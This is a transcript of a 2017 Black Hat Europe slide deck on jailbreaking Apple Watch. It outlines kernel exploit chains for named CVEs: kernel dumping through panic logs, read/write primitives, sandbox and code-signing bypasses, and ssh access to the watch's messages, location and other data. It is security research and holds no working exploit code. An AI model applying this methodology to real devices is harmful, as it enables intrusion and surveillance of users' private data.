Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Jailbreaking Apple Watch

Max Bazaliy
December 07, 2017

Jailbreaking Apple Watch

BlackHat Europe 2017 Edition

Max Bazaliy

December 07, 2017
Tweet

More Decks by Max Bazaliy

Other Decks in Programming

Transcript

  1. December 4-7, 2017
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    Max Bazaliy
    Jailbreaking
    Apple Watch

    View Slide

  2. December 4-7, 2017
    whoami 1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    o  Security researcher at Lookout
    o  iOS/tvOS/WatchOS jailbreak author
    o  Lead researcher on Pegasus exploit chain
    o  Focused on software and hardware
    exploitation

    View Slide

  3. December 4-7, 2017
    o  Released in 2015
    o  Apple S1/S2/S3 processor
    o  ARMv7k 32 bit architecture
    o  512/768 MB RAM
    o  One/Dual-core processor
    o  WatchOS
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    What is Apple Watch ?

    View Slide

  4. December 4-7, 2017
    o  Fetch data from a phone
    o  Data transfer over Bluetooth
    o  Sync over Bluetooth and WiFi
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    How does it work ?

    View Slide

  5. December 4-7, 2017
    o  Access to file system (messages, emails..)
    o  Run debug tools on a watch (radare, frida)
    o  iPhone attack vector J
    Why to jailbreak a watch ? 1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12

    View Slide

  6. December 4-7, 2017
    Apple Watch security
    o  Secure boot chain
    o  Mandatory Code Signing
    o  Sandbox
    o  Exploit Mitigations
    o  Data Protection
    o  Secure Enclave Processor
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12

    View Slide

  7. December 4-7, 2017
    Possible attack vectors
    o  Memory corruption over Webkit
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12

    View Slide

  8. December 4-7, 2017
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    Possible attack vectors
    o  Memory corruption over Webkit
    o  Boot chain attack over usb (diags port J)

    View Slide

  9. December 4-7, 2017
    Possible attack vectors
    o  Memory corruption over Webkit
    o  Boot chain attack over usb (diags port J)
    o  Application extension based
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12

    View Slide

  10. December 4-7, 2017
    Jailbreak step by step
    o  Get initial code execution
    o  Leak kernel base
    o  Dump whole kernel (for encrypted kernels)
    o  Find gadgets and setup primitives
    o  Disable security restrictions
    o  Run ssh client on a watch
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12

    View Slide

  11. December 4-7, 2017
    Bugs of interest
    o  WatchOS 2.x
    - CVE-2016-4656 & CVE-2016-4680
    o  WatchOS 3.1.2
    - CVE-2017-2370
    o  WatchOS 4.0.1
    - CVE-2017-13861 ? J
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12

    View Slide

  12. December 4-7, 2017
    Leaking kernel base – WatchOS 2.x
    o  CVE-2016-4680
    o  Object constructor missing bounds checking
    o  OSNumber object with high number of bits
    o  Object length used to copy value from stack
    o  Kernel stack memory leaked
    o  Can be triggered from an app’s sandbox
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12

    View Slide

  13. December 4-7, 2017
    CVE-2016-4656 exploitation
    o  Kernel mode UAF in OSUnserializeBinary
    o  OSString object deallocated
    o  retain() called on deallocated object
    o  Fake object with fake vtable –> code exec
    o  Can be triggered from an app’s sandbox
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24

    View Slide

  14. December 4-7, 2017
    o  Problem: No WatchOS 2.x kernel dumps
    o  No decryption keys for WatchOS kernels
    o  Idea: read kernel as OSString chunks
    o  vtable offset required to fake OSString
    o  vtable stored in __DATA.__const in kernel
    Dumping WatchOS 2.x kernel 13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24

    View Slide

  15. December 4-7, 2017
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24

    View Slide

  16. December 4-7, 2017
    Getting OSString vtable
    o  OSString vtable reference in OSUnserializeBinary!
    o  OSUnserializeBinary reference in OSUnserializeXML
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24

    View Slide

  17. December 4-7, 2017
    Dumping kernel by panic logs
    o  We can control pointer to vtable
    o  Use address to leak as vtable address
    o  vtable will be dereferenced by retain() call
    o  Kernel will crash, but save panic log
    o  Address content appear in register state
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24

    View Slide

  18. December 4-7, 2017
    It’s fun ! 13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24

    View Slide

  19. December 4-7, 2017
    Dumping kernel by 4 bytes
    o  Use address to leak as fake vtable address
    o  Watch will crash, wait until it restore
    o  ssh to a iPhone and run synchronization service
    o  Copy panic from Watch to iPhone and to Mac
    o  Parse panic, read 4 bytes and disassemble !
    o  Update address with 4 bytes delta and upload app
    o  Repeat
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24

    View Slide

  20. December 4-7, 2017
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24

    View Slide

  21. December 4-7, 2017
    Next step – full kernel dump
    o  Now use fake OSString obj to read kernel
    o  Read data via IORegistryEntryGetProperty
    o  Leak kernel header, calculate kernel size
    o  Dump full kernel to userland by chunks
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24

    View Slide

  22. December 4-7, 2017
    Next step – kernel symbolication
    o  Find and list all kexts
    o  Find sysent and resolve syscalls
    o  Find and resolve mach traps
    o  Resolve IOKit objects vtable
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24

    View Slide

  23. December 4-7, 2017
    Next step – setting up primitives
    o  Scan kernel dump for gadgets
    o  Set up exec primitive
    o  Set up kernel read & write primitives
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24

    View Slide

  24. December 4-7, 2017
    Jailbreaking Watch OS 3.x
    o  Kernels are not encrypted now
    o  No need to dump and symbolicate anymore
    o  New heap layout, some AMFI fixes
    o  More sandbox restrictions
    o  Vurnerable to CVE-2017-2370
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24

    View Slide

  25. December 4-7, 2017
    CVE-2017-2370
    o  Kernel heap overflow
    o  mach_voucher_extract_attr_recipe
    o  Usermode pointer is used as copyin size arg
    o  We can corrupt mach message to get kernel RW
    o  Allocate userclient and read obj vtable -> KASLR
    o  Can be triggered from an app’s sandbox
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36

    View Slide

  26. December 4-7, 2017
    Next step – patchfinder
    o  String \ byte pattern + xref + analysis
    o  Simple arm emulator is helpful
    o  Resolve syscalls table, mach traps table
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36

    View Slide

  27. December 4-7, 2017
    Getting root and sandbox bypass
    o  Patch setreuid (no KPP)
    o  patch ucred in proc structure in kernel
    o  patch sandbox label value in ucred
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36

    View Slide

  28. December 4-7, 2017
    Getting kernel task
    o  Patch task_for_pid()
    o  Or save kernel sself in task bootstrap port
    o  Read it back via task_get_special_port()
    o  Restore original bootstrap port value
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36

    View Slide

  29. December 4-7, 2017
    Disable codesign checks
    o  Patch _debug to 1
    o  patch _nl_symbol_ptr (got) entries
    o  Patch amfi variables
    - cs_enforcement_disable
    - allow_invalid_signatures
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36

    View Slide

  30. December 4-7, 2017
    Remount rootfs
    o  Patch __mac_mount
    o  Change mount flags in rootfs vnode
    o  Patch lwvm is_write_protected check
    o  Patch PE_i_can_has_debugger in lwvm
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36

    View Slide

  31. December 4-7, 2017
    Spawning ssh client
    o  Compile dropbear ssh client for ARMv7k
    o  Compile basic tools package for ARMv7k
    o  More restricted sandbox than iOS
    o  Null out WatchOS specific sandbox ops
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36

    View Slide

  32. December 4-7, 2017
    ssh connection problem…
    "awdl0/ipv6" = "fe80::c837:8аff:fe60:90c2";
    "lo0/ipv4” = "127.0.0.1";
    "lo0/ipv6" = "fe80::1";
    "utun0/ipv6" = "fe80::face:5e30:271e:3cd3";
    o  WatchOS interfaces
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36

    View Slide

  33. December 4-7, 2017
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36

    View Slide

  34. December 4-7, 2017
    Watch iPhone port forwarding
    NSDictionary *comm = @{!
    @"Command" :@"StartForwardingServicePort",
    @"ForwardedServiceName" :@"com.apple.syslog_relay",!
    @"GizmoRemotePortNumber" :[NSNumber numberWithUnsignedShort: pt],!
    @"IsServiceLowPriority" :@0,};!
    !
    AMDServiceConnectionSendMessage(serviceConnection,!
    (__bridge CFPropertyListRef)(comm),
    kCFPropertyListXMLFormat_v1_0);!
    !
    AMDServiceConnectionReceiveMessage(serviceConnection, &response,
    (CFPropertyListFormat*)&format);!
    !
    NSNumber *iphone_port = response[@"CompanionProxyServicePort"];!
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36

    View Slide

  35. December 4-7, 2017
    Black Hat Sound Bytes 25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36

    View Slide

  36. December 4-7, 2017
    SSH over WiFi
    o  Watch can be connected to 2.4Hz WiFi
    o  Can be a little bit tricky but it works
    o  iPhone is not involved at all J
    o  Just leak address and connect
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36

    View Slide

  37. December 4-7, 2017
    Black Hat Sound Bytes 37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48

    View Slide

  38. December 4-7, 2017
    Apple Watch usage
    o  Watch has access to SMS, Calls, Health
    o  Photos and emails synced to Watch
    o  Access to GPS location
    o  Microphone usage
    o  Apple Pay
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48

    View Slide

  39. December 4-7, 2017
    Post jailbreak
    o  Full access to jailbroken watch file system
    - Messages
    - Call history
    - Contacts
    - Emails
    - GPS loacation
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48

    View Slide

  40. December 4-7, 2017
    What's next ?
    o  Interpose or trampoline system functions
    o  Catch data on sync with a iPhone
    o  Call recordings
    o  Create tweaks for a watch
    o  Run frida and radare
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48

    View Slide

  41. December 4-7, 2017
    Black Hat sound bytes
    o  WatchOS security is mostly equal to iOS
    o  Easier data forensics on a Watch
    o  Exploits became more valuable
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48

    View Slide

  42. December 4-7, 2017
    @mbazaliy
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48

    View Slide